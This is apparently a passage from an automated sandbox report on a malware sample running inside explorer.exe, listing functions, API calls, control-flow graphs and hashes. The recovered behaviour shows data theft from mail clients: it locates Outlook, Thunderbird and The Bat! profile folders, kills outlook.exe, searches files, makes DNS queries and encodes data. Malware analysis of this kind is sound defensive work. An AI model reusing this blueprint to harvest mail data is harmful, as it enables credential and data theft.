                        • Instruction Fuzzy Hash: 53F0E520F11A080BEFAC77BD685D3382288EB98310F508629F515D33D2DC3D8E468301
                        Function 00982774 Relevance: 6.1, APIs: 4, Instructions: 124registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • RegOpenKeyExW.KERNELBASE ref: 009827C7
                        • RegQueryValueExW.KERNELBASE ref: 009827F4
                        • RegQueryValueExW.KERNELBASE ref: 0098283A
                        • RegCloseKey.KERNELBASE ref: 00982860
                          • Part of subcall function 00981860: RtlDeleteBoundaryDescriptor.NTDLL ref: 00981880
                        Memory Dump Source
                        • Source File: 00000007.00000002.1944428981.0000000000981000.00000040.80000000.00040000.00000000.sdmp, Offset: 00981000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_981000_explorer.jbxd
                        Similarity
                        • API ID: QueryValue$BoundaryCloseDeleteDescriptorOpen
                        • String ID:
                        • API String ID: 3453524928-0
                        • Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                        • Instruction ID: 587fad6b4036330ff2011fe59c6b15879dedd709178a1dee398ff97f89d3a70d
                        • Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                        • Instruction Fuzzy Hash: 5B31A67020CB488FEB68EF29D45977A77E4FBE8355F54062EE48AC2364DF24C8468742
                        Function 0098372C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 22 98372c-9837ba call 981838 RegCreateKeyExW 26 9837bc-9837cb RegCloseKey 22->26 27 9837d6-9837f0 call 981860 22->27 26->27 28 9837cd-9837d3 26->28 28->27
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.1944428981.0000000000981000.00000040.80000000.00040000.00000000.sdmp, Offset: 00981000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_981000_explorer.jbxd
                        Similarity
                        • API ID: CloseCreate
                        • String ID: ?
                        • API String ID: 2932200918-1684325040
                        • Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                        • Instruction ID: 2f539629b779b33a9be4ac5a4c29fbbb303a1f4a2fe4ea498611014290202682
                        • Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                        • Instruction Fuzzy Hash: E1118E70608B488FD750EF29D48866AB7E1FB98305F40062EE48AC3320DF38D985CB82
                        Function 0098A298 Relevance: 4.8, APIs: 3, Instructions: 252memorylibraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 31 98a298-98a29b 32 98a2a5-98a2a9 31->32 33 98a2ab-98a2b3 32->33 34 98a2b5 32->34 33->34 35 98a29d-98a2a3 34->35 36 98a2b7 34->36 35->32 37 98a2ba-98a2c1 36->37 39 98a2cd 37->39 40 98a2c3-98a2cb 37->40 39->37 41 98a2cf-98a2d2 39->41 40->39 42 98a2d4-98a2e2 41->42 43 98a2e7-98a2f4 41->43 44 98a31e-98a339 42->44 45 98a2e4-98a2e5 42->45 53 98a30e-98a31c call 98a25a 43->53 54 98a2f6-98a2f8 43->54 46 98a36a-98a36d 44->46 45->43 48 98a36f-98a370 46->48 49 98a372-98a379 46->49 51 98a351-98a355 48->51 52 98a37f-98a383 49->52 55 98a33b-98a33e 51->55 56 98a357-98a35a 51->56 57 98a3e0-98a3e9 52->57 58 98a385-98a39e LoadLibraryA 52->58 53->32 59 98a2fb-98a302 54->59 55->49 64 98a340 55->64 56->49 60 98a35c-98a360 56->60 61 98a3ec-98a3f5 57->61 63 98a39f-98a3a6 58->63 79 98a30c 59->79 80 98a304-98a30a 59->80 65 98a341-98a345 60->65 66 98a362-98a369 60->66 67 98a41a-98a46a VirtualProtect * 2 61->67 68 98a3f7-98a3f9 61->68 63->52 70 98a3a8 63->70 64->65 65->51 77 98a347-98a349 65->77 66->46 74 98a46e-98a473 67->74 72 98a3fb-98a40a 68->72 73 98a40c-98a418 68->73 75 98a3aa-98a3b2 70->75 76 98a3b4-98a3bc 70->76 72->61 73->72 74->74 81 98a475-98a484 74->81 82 98a3be-98a3ca 75->82 76->82 77->51 78 98a34b-98a34f 77->78 78->51 78->56 79->53 79->59 80->79 85 98a3cc-98a3d3 82->85 86 98a3d5-98a3df 82->86 85->63
                        APIs
                        • LoadLibraryA.KERNELBASE ref: 0098A397
                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0098A441
                        • VirtualProtect.KERNELBASE ref: 0098A45F
                        Memory Dump Source
                        • Source File: 00000007.00000002.1944428981.0000000000989000.00000040.80000000.00040000.00000000.sdmp, Offset: 00989000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_989000_explorer.jbxd
                        Similarity
                        • API ID: ProtectVirtual$LibraryLoad
                        • String ID:
                        • API String ID: 895956442-0
                        • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                        • Instruction ID: 86abad3b222c2871a7321b49b8ca5a416f76deb2b5775b64567ea95ee877ca90
                        • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                        • Instruction Fuzzy Hash: F651593275891E4BEB24BB7C9CC47F5B3D1F769321B180A2BD49AC3385E559D8468383
                        Function 00983254 Relevance: 4.7, APIs: 3, Instructions: 210COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 87 983254-983287 call 98298c 90 98343a-983456 87->90 91 98328d-983297 call 98298c 87->91 91->90 94 98329d-9832aa call 98272c 91->94 97 9832ac-9832b3 94->97 98 9832b5 94->98 99 9832b7-9832c2 call 982688 97->99 98->99 102 9832c8-9832fe call 982688 call 981838 * 2 call 982938 99->102 103 98342c-983435 call 9830a8 99->103 113 98340c-983427 call 981860 * 4 102->113 114 983304-983318 GetPrivateProfileSectionNamesW 102->114 103->90 113->103 114->113 116 98331e-983326 114->116 116->113 117 98332c-98332f 116->117 117->113 119 983335-983348 117->119 124 98334e-983377 GetPrivateProfileStringW 119->124 125 9833f0-983406 119->125 124->125 127 983379-983398 GetProfileIntW 124->127 125->113 125->117 130 98339a-9833ad call 982688 127->130 131 9833e5-9833eb call 9830a8 127->131 135 9833af-9833b3 130->135 136 9833c6-9833e3 call 9830a8 call 981860 130->136 131->125 137 9833bd-9833c4 135->137 138 9833b5-9833ba 135->138 136->125 137->135 137->136 138->137
                        APIs
                          • Part of subcall function 0098298C: GetFileAttributesW.KERNELBASE ref: 0098299E
                        • GetPrivateProfileSectionNamesW.KERNEL32 ref: 0098330F
                        • GetPrivateProfileStringW.KERNEL32 ref: 0098336F
                        • GetProfileIntW.KERNEL32 ref: 0098338C
                          • Part of subcall function 009830A8: FindFirstFileW.KERNELBASE ref: 00983104
                          • Part of subcall function 00981860: RtlDeleteBoundaryDescriptor.NTDLL ref: 00981880
                        Memory Dump Source
                        • Source File: 00000007.00000002.1944428981.0000000000981000.00000040.80000000.00040000.00000000.sdmp, Offset: 00981000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_981000_explorer.jbxd
                        Similarity
                        • API ID: Profile$FilePrivate$AttributesBoundaryDeleteDescriptorFindFirstNamesSectionString
                        • String ID:
                        • API String ID: 1903369626-0
                        • Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                        • Instruction ID: f8f670b172a7ee10ee054fe6036810529771f56cc3ecf7f81d6b64a89fae4d59
                        • Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                        • Instruction Fuzzy Hash: 6951C930718F094FDB59BB3D985677933D6EBD8700B84456EE40AC33A6EE64DD428386
                        Function 00983458 Relevance: 4.7, APIs: 3, Instructions: 172registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • StrStrIW.KERNELBASE ref: 0098347E
                        • RegOpenKeyExW.KERNELBASE ref: 0098353F
                        • RegEnumKeyExW.KERNELBASE ref: 009835D6
                          • Part of subcall function 00982774: RegOpenKeyExW.KERNELBASE ref: 009827C7
                          • Part of subcall function 00982774: RegQueryValueExW.KERNELBASE ref: 009827F4
                          • Part of subcall function 00982774: RegQueryValueExW.KERNELBASE ref: 0098283A
                          • Part of subcall function 00982774: RegCloseKey.KERNELBASE ref: 00982860
                          • Part of subcall function 00983254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 0098330F
                          • Part of subcall function 00981860: RtlDeleteBoundaryDescriptor.NTDLL ref: 00981880
                        Memory Dump Source
                        • Source File: 00000007.00000002.1944428981.0000000000981000.00000040.80000000.00040000.00000000.sdmp, Offset: 00981000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_981000_explorer.jbxd
                        Similarity
                        • API ID: OpenQueryValue$BoundaryCloseDeleteDescriptorEnumNamesPrivateProfileSection
                        • String ID:
                        • API String ID: 2369215640-0
                        • Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                        • Instruction ID: 4a51f0955a73b86546843399de5e4e1e34b1956b5eb0b7e20fc2bf2a2432018a
                        • Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                        • Instruction Fuzzy Hash: EA415730718B084FDB98FF6D849972AB6E6FBD8741F00496EA14EC3361DE34D9458B82
                        Function 00982938 Relevance: 3.0, APIs: 2, Instructions: 34fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 232 982938-982943 233 982984 232->233 234 982945-982948 232->234 236 982986-98298b 233->236 234->233 235 98294a-982970 CreateFileW 234->235 237 982980-982982 235->237 238 982972-98297a FindCloseChangeNotification 235->238 237->236 238->237
                        APIs
                        • CreateFileW.KERNELBASE ref: 00982966
                        • FindCloseChangeNotification.KERNELBASE ref: 0098297A
                        Memory Dump Source
                        • Source File: 00000007.00000002.1944428981.0000000000981000.00000040.80000000.00040000.00000000.sdmp, Offset: 00981000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_981000_explorer.jbxd
                        Similarity
                        • API ID: ChangeCloseCreateFileFindNotification
                        • String ID:
                        • API String ID: 727422849-0
                        • Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                        • Instruction ID: 1d8a231b7867b036719b59bfaeaaee73a2e176fe05d3030dcbffe7c2255cf09c
                        • Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                        • Instruction Fuzzy Hash: 1CF09B7021570A4FE7547FB94598336B5D4FB48355F18473DE46AC23D0D73A89468742
                        Function 0098298C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 251 98298c-982997 252 982999-98299c 251->252 253 9829b5 251->253 252->253 254 98299e-9829a7 GetFileAttributesW 252->254 255 9829b7-9829bc 253->255 256 9829a9-9829af 254->256 257 9829b1-9829b3 254->257 256->257 257->255
                        APIs
                        • GetFileAttributesW.KERNELBASE ref: 0098299E
                        Memory Dump Source
                        • Source File: 00000007.00000002.1944428981.0000000000981000.00000040.80000000.00040000.00000000.sdmp, Offset: 00981000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_981000_explorer.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                        • Instruction ID: f097b861846bf5aa4b393aeed6c1f71201a2301ddbbdfd18ff249a52409c9a1b
                        • Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                        • Instruction Fuzzy Hash: 73D0A732712915077B6437F90ADD27130A8D71932AF14033AEA36C13E0E28FCCD5A301
                        Function 00981860 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 258 981860-981870 call 981ad4 261 981872-981880 RtlDeleteBoundaryDescriptor 258->261 262 981886-98188b 258->262 261->262
                        APIs
                        • RtlDeleteBoundaryDescriptor.NTDLL ref: 00981880
                        Memory Dump Source
                        • Source File: 00000007.00000002.1944428981.0000000000981000.00000040.80000000.00040000.00000000.sdmp, Offset: 00981000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_981000_explorer.jbxd
                        Similarity
                        • API ID: BoundaryDeleteDescriptor
                        • String ID:
                        • API String ID: 3203483114-0
                        • Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                        • Instruction ID: 41e37559a9d92cc9a266f07babbd7a667df196715fdfd3cdff96bfe6396d8111
                        • Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                        • Instruction Fuzzy Hash: 7BD01224716A040BEF6CBBFA5C8E2747ADAE798212B188065B819C3351DD39C896C341

                        Execution Graph

                        Execution Coverage:14.4%
                        Dynamic/Decrypted Code Coverage:96.2%
                        Signature Coverage:3.8%
                        Total number of Nodes:212
                        Total number of Limit Nodes:2
                        execution_graph 826 832013 827 832036 826->827 828 832029 lstrlen 826->828 837 8329b7 GetProcessHeap RtlAllocateHeap 827->837 828->827 830 83203e lstrcat 831 832073 lstrcat 830->831 832 83207a 830->832 831->832 838 8320a7 832->838 835 832999 3 API calls 836 83209d 835->836 837->830 872 832415 838->872 842 8320d4 877 832938 lstrlen MultiByteToWideChar 842->877 844 8320e3 878 8324cc RtlZeroMemory 844->878 847 832135 RtlZeroMemory 849 83216a 847->849 848 832999 3 API calls 850 83208a 848->850 853 8323f7 849->853 855 832198 849->855 880 83243d 849->880 850->835 852 8323dd 852->853 854 832999 3 API calls 852->854 853->848 854->853 855->852 889 8329b7 GetProcessHeap RtlAllocateHeap 855->889 857 832268 wsprintfW 858 83228e 857->858 862 8322fb 858->862 890 8329b7 GetProcessHeap RtlAllocateHeap 858->890 860 8322c8 wsprintfW 860->862 861 8323ba 863 832999 3 API calls 861->863 862->861 891 8329b7 GetProcessHeap RtlAllocateHeap 862->891 864 8323ce 863->864 864->852 866 832999 3 API calls 864->866 866->852 867 8323b3 870 832999 3 API calls 867->870 868 832346 868->867 892 83296b VirtualAlloc 868->892 870->861 871 8323a0 RtlMoveMemory 871->867 873 8320c6 872->873 874 83241f 872->874 876 8329b7 GetProcessHeap RtlAllocateHeap 873->876 893 832818 lstrlen lstrlen 874->893 876->842 877->844 879 8320f3 878->879 879->847 879->853 881 8324ab 880->881 883 83244a 880->883 881->855 882 83244e DnsQuery_W 882->883 883->881 883->882 884 83248d DnsFree inet_ntoa 883->884 884->883 885 8324ad 884->885 895 8329b7 GetProcessHeap RtlAllocateHeap 885->895 887 8324b7 896 832938 lstrlen MultiByteToWideChar 887->896 889->857 890->860 891->868 892->871 894 832839 893->894 894->873 895->887 896->881 673 831000 674 831010 673->674 675 831007 673->675 677 831016 675->677 685 8327e2 VirtualQuery 677->685 680 831022 680->674 682 83102e RtlMoveMemory NtUnmapViewOfSection 688 83104f 682->688 686 83101e 685->686 686->680 687 8329b7 GetProcessHeap RtlAllocateHeap 686->687 687->682 727 8329b7 GetProcessHeap RtlAllocateHeap 688->727 690 83105c 728 8329b7 GetProcessHeap RtlAllocateHeap 690->728 692 83106b ExpandEnvironmentStringsW 693 831085 692->693 694 83108c ExpandEnvironmentStringsW 692->694 729 83123a 693->729 696 8310a0 ExpandEnvironmentStringsW 694->696 697 831099 694->697 699 8310b4 SHGetSpecialFolderPathW 696->699 700 8310ad 696->700 698 83123a 24 API calls 697->698 698->696 701 8310c5 699->701 702 8310cc ExpandEnvironmentStringsW 699->702 703 83123a 24 API calls 700->703 704 83123a 24 API calls 701->704 705 8310e0 ExpandEnvironmentStringsW 702->705 706 8310d9 702->706 703->699 704->702 708 8310f4 ExpandEnvironmentStringsW 705->708 709 8310ed 705->709 736 8311cc 706->736 711 831101 708->711 712 831108 ExpandEnvironmentStringsW 708->712 751 831192 709->751 713 831192 16 API calls 711->713 714 831115 712->714 715 83111c ExpandEnvironmentStringsW 712->715 713->712 716 831192 16 API calls 714->716 717 831130 715->717 718 831129 715->718 716->715 758 832999 717->758 719 831192 16 API calls 718->719 719->717 722 831187 ExitProcess 724 83114e 725 83117f 724->725 726 831158 wsprintfA 724->726 725->722 726->725 726->726 727->690 728->692 764 83274a CreateToolhelp32Snapshot 729->764 734 83255c 16 API calls 735 831268 734->735 735->694 737 83255c 16 API calls 736->737 738 8311e6 737->738 739 83255c 16 API calls 738->739 740 8311f3 739->740 741 83255c 16 API calls 740->741 742 831200 741->742 743 83255c 16 API calls 742->743 744 83120d 743->744 745 83255c 16 API calls 744->745 746 83121a 745->746 747 83255c 16 API calls 746->747 748 831227 747->748 749 83255c 16 API calls 748->749 750 831234 749->750 750->705 752 83255c 16 API calls 751->752 753 8311ac 752->753 754 83255c 16 API calls 753->754 755 8311b9 754->755 756 83255c 16 API calls 755->756 757 8311c6 756->757 757->708 759 8327e2 VirtualQuery 758->759 760 8329a1 759->760 761 831137 760->761 762 8329a5 GetProcessHeap HeapFree 760->762 761->722 763 8329b7 GetProcessHeap RtlAllocateHeap 761->763 762->761 763->724 765 832765 Process32First 764->765 766 831249 764->766 767 8327ae 765->767 773 83255c 766->773 768 8327b2 FindCloseChangeNotification 767->768 769 83277f lstrcmpiA 767->769 768->766 770 8327a0 Process32Next 769->770 771 832795 769->771 770->767 788 8327be OpenProcess 771->788 791 8329b7 GetProcessHeap RtlAllocateHeap 773->791 775 83257a lstrcatW PathAppendW 776 8325a2 FindFirstFileW 775->776 777 83265d 775->777 776->777 786 8325b9 776->786 778 832999 3 API calls 777->778 780 83125b 778->780 779 8325bd RtlZeroMemory 779->786 780->734 781 83260f lstrcatW PathAppendW 782 83263e FindNextFileW 781->782 783 832627 StrStrIW 781->783 782->779 784 832652 FindClose 782->784 783->782 783->786 784->777 785 8325df lstrcatW PathAppendW 785->782 785->786 786->779 786->781 786->782 786->785 787 83255c 5 API calls 786->787 787->786 789 8327e0 788->789 790 8327d0 TerminateProcess CloseHandle 788->790 789->770 790->789 791->775 897 832917 lstrlenW WideCharToMultiByte 811 839cf6 812 839caf 811->812 812->811 813 839f00 VirtualProtect VirtualProtect 812->813 814 839ec9 812->814 813->814 814->814 792 839d24 794 839caf 792->794 793 839f00 VirtualProtect VirtualProtect 795 839ec9 793->795 794->793 794->795 815 8318f4 CreateFileW 816 831919 GetFileSize 815->816 817 83196d 815->817 818 831965 CloseHandle 816->818 819 831929 816->819 818->817 819->818 825 8329b7 GetProcessHeap RtlAllocateHeap 819->825 821 831936 ReadFile 824 83194b 821->824 822 832999 3 API calls 823 831964 822->823 823->818 824->822 825->821 915 831e44 916 831e5b lstrlen CharLowerBuffA 915->916 923 831eb3 915->923 917 831e75 916->917 920 831e9d 916->920 918 831e7f lstrcmpiA 917->918 917->920 918->917 918->923 919 8326a9 922 831ece 8 API calls 920->922 920->923 921 832692 lstrlen RtlMoveMemory 921->919 922->923 923->919 923->921 796 83118f 797 831192 796->797 798 83255c 16 API calls 797->798 799 8311ac 798->799 800 83255c 16 API calls 799->800 801 8311b9 800->801 802 83255c 16 API calls 801->802 803 8311c6 802->803 898 831e3e 899 831e5b lstrlen CharLowerBuffA 898->899 904 831eb3 898->904 900 831e75 899->900 905 831e9d 899->905 901 831e7f lstrcmpiA 900->901 900->905 901->900 901->904 902 8326a9 903 832692 lstrlen RtlMoveMemory 903->902 904->902 904->903 905->904 907 831ece StrStrIA 905->907 908 831ef5 RtlMoveMemory RtlMoveMemory StrStrIA 907->908 909 831eee 907->909 908->909 910 831f37 StrStrIA 908->910 909->904 910->909 911 831f4a StrStrIA 910->911 911->909 912 831f5d lstrlen 911->912 912->909 913 831f6a 912->913 913->909 914 831f9b lstrlen 913->914 914->909 914->913 804 8326ac lstrlen 805 8326f3 804->805 806 8326c4 CryptBinaryToStringA 804->806 806->805 807 8326d7 806->807 810 8329b7 GetProcessHeap RtlAllocateHeap 807->810 809 8326e2 CryptBinaryToStringA 809->805 810->809 924 83295c VirtualFree

                        Executed Functions

                        Function 0083255C Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88stringfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 008329B7: GetProcessHeap.KERNEL32(00000008,00000412,0083257A,008318F4), ref: 008329BA
                          • Part of subcall function 008329B7: RtlAllocateHeap.NTDLL(00000000), ref: 008329C1
                        • lstrcatW.KERNEL32(00000000), ref: 00832588
                        • PathAppendW.SHLWAPI(00000000,*.*,?,008318F4), ref: 00832594
                        • FindFirstFileW.KERNELBASE(00000000,?,?,008318F4), ref: 008325A8
                        • RtlZeroMemory.NTDLL(00000209,00000209), ref: 008325C3
                        • lstrcatW.KERNEL32(00000209,?), ref: 008325E1
                        • PathAppendW.SHLWAPI(00000209,?,?,008318F4), ref: 008325ED
                        • lstrcatW.KERNEL32(00000209,?), ref: 00832611
                        • PathAppendW.SHLWAPI(00000209,?,?,008318F4), ref: 0083261D
                        • StrStrIW.SHLWAPI(00000209,?,?,008318F4), ref: 0083262C
                        • FindNextFileW.KERNELBASE(00000000,?,?,008318F4), ref: 00832644
                        • FindClose.KERNELBASE(00000000,?,008318F4), ref: 00832653
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000831000.00000040.80000000.00040000.00000000.sdmp, Offset: 00831000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_831000_explorer.jbxd
                        Similarity
                        • API ID: AppendFindPathlstrcat$FileHeap$AllocateCloseFirstMemoryNextProcessZero
                        • String ID: *.*
                        • API String ID: 1648349226-438819550
                        • Opcode ID: f9fa6071d872589d0f7b43af970034eb7f8c5750e0046ad7c28ff78f66a6ec36
                        • Instruction ID: 7428086dba394464508dc642ebd078fce205ff1e5d81e13fa9b7c9f8cc64d159
                        • Opcode Fuzzy Hash: f9fa6071d872589d0f7b43af970034eb7f8c5750e0046ad7c28ff78f66a6ec36
                        • Instruction Fuzzy Hash: D4219C71204705AFD714AF24AD59E6FBBACFFD5700F00091CFA51E2161EB388A068BE6
                        Function 0083274A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36processstringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00832758
                        • Process32First.KERNEL32(00000000,?), ref: 00832777
                        • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0083278B
                        • Process32Next.KERNEL32(00000000,00000128), ref: 008327A8
                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 008327B3
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000831000.00000040.80000000.00040000.00000000.sdmp, Offset: 00831000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_831000_explorer.jbxd
                        Similarity
                        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcmpi
                        • String ID: outlook.exe
                        • API String ID: 545148253-749849299
                        • Opcode ID: 22d55fbb54ad4e405dc07683978c2a7e3c3229114f80f33afaddf8a7ebb02578
                        • Instruction ID: f93a34e00094a3c89f39f1df0200fdc86f5c622ea51832fb6bb4c4cc4d9f75a1
                        • Opcode Fuzzy Hash: 22d55fbb54ad4e405dc07683978c2a7e3c3229114f80f33afaddf8a7ebb02578
                        • Instruction Fuzzy Hash: 4FF09630502528ABD724AB74DC49FEA777CFB88721F000590E859E2190DB348F554ED1
                        Function 00831016 Relevance: 3.0, APIs: 2, Instructions: 19nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 008327E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00832664,?,008318F4), ref: 008327EF
                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 0083103A
                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00831043
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000831000.00000040.80000000.00040000.00000000.sdmp, Offset: 00831000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_831000_explorer.jbxd
                        Similarity
                        • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                        • String ID:
                        • API String ID: 1675517319-0
                        • Opcode ID: 5714876d5f4f5d233b0cf5fd7f7eadcd2d9355ed17bc69ef11c7726dbb52483f
                        • Instruction ID: 75432cf11c2a406054f94ae66489d347921f73dbecd23daa3147fc080c20d2bf
                        • Opcode Fuzzy Hash: 5714876d5f4f5d233b0cf5fd7f7eadcd2d9355ed17bc69ef11c7726dbb52483f
                        • Instruction Fuzzy Hash: F3D05E31801660B7CE68777CBC6EADA2A48FFC5730F244A11B525D21D2C9354A8087F1
                        Function 0083104F Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 115COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 008329B7: GetProcessHeap.KERNEL32(00000008,00000412,0083257A,008318F4), ref: 008329BA
                          • Part of subcall function 008329B7: RtlAllocateHeap.NTDLL(00000000), ref: 008329C1
                        • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0083104E,?,00831010), ref: 0083107F
                        • ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0083104E,?,00831010), ref: 00831093
                        • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\Microsoft\Outlook,00000000,00000208,?,?,?,0083104E,?,00831010), ref: 008310A7
                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000005,00000000,?,?,?,0083104E,?,00831010), ref: 008310BB
                        • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Thunderbird,00000000,00000208,?,?,?,0083104E,?,00831010), ref: 008310D3
                        • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\The Bat!,00000000,00000208,?,?,?,0083104E,?,00831010), ref: 008310E7
                        • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\The Bat!,00000000,00000208,?,?,?,0083104E,?,00831010), ref: 008310FB
                        • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\BatMail,00000000,00000208,?,?,?,0083104E,?,00831010), ref: 0083110F
                        • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\BatMail,00000000,00000208,?,?,?,0083104E,?,00831010), ref: 00831123
                        • wsprintfA.USER32 ref: 0083116B
                        • ExitProcess.KERNEL32 ref: 00831189
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000831000.00000040.80000000.00040000.00000000.sdmp, Offset: 00831000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_831000_explorer.jbxd
                        Similarity
                        • API ID: EnvironmentExpandStrings$HeapProcess$AllocateExitFolderPathSpecialwsprintf
                        • String ID: %ALLUSERSPROFILE%\BatMail$%ALLUSERSPROFILE%\Microsoft\Outlook$%ALLUSERSPROFILE%\The Bat!$%APPDATA%\BatMail$%APPDATA%\Microsoft\Outlook$%APPDATA%\The Bat!$%APPDATA%\Thunderbird$%LOCALAPPDATA%\Microsoft\Outlook$%s,
                        • API String ID: 1709485025-1688604020
                        • Opcode ID: 8291d8e95b2c3c40437eb420a80fb55996d48a36fa8b282ba9a0c8568a9a4f8c
                        • Instruction ID: d6cf2b8fe7bac4cd1753297f33c6a20761de08383f13ec2acf6b182b9102d539
                        • Opcode Fuzzy Hash: 8291d8e95b2c3c40437eb420a80fb55996d48a36fa8b282ba9a0c8568a9a4f8c
                        • Instruction Fuzzy Hash: A531BC513416292AEE2533694C5EFBF684DFFD0F90F054124BA16DA382DE598E0186F6
                        Function 00839CF6 Relevance: 3.3, APIs: 2, Instructions: 282COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 82 839cf6-839d10 83 839d15 82->83 84 839d16-839d28 83->84 86 839d2a 84->86 87 839d8e-839d8f 84->87 88 839caf-839cbd 86->88 89 839d2c-839d36 86->89 90 839d90-839d95 87->90 92 839cd1-839cf4 88->92 93 839cbf-839cce 88->93 89->83 91 839d38-839d43 89->91 94 839d96-839d98 90->94 95 839d44-839d4c 91->95 92->82 93->92 96 839da1 94->96 97 839d9a-839d9f 94->97 95->95 98 839d4e-839d50 95->98 96->90 99 839da3 96->99 97->96 101 839d52-839d55 98->101 102 839d79-839d88 98->102 100 839da8-839daa 99->100 103 839db3-839db7 100->103 104 839dac-839db1 100->104 101->84 105 839d57-839d75 101->105 102->97 103->100 106 839db9 103->106 104->103 105->102 107 839f3d 105->107 108 839dc4-839dc9 106->108 109 839dbb-839dc2 106->109 107->107 110 839dcb-839dd4 108->110 111 839dd8-839dda 108->111 109->100 109->108 112 839dd6 110->112 113 839e4a-839e4d 110->113 114 839de3-839de7 111->114 115 839ddc-839de1 111->115 112->111 116 839e52-839e55 113->116 117 839df0-839df2 114->117 118 839de9-839dee 114->118 115->114 119 839e57-839e59 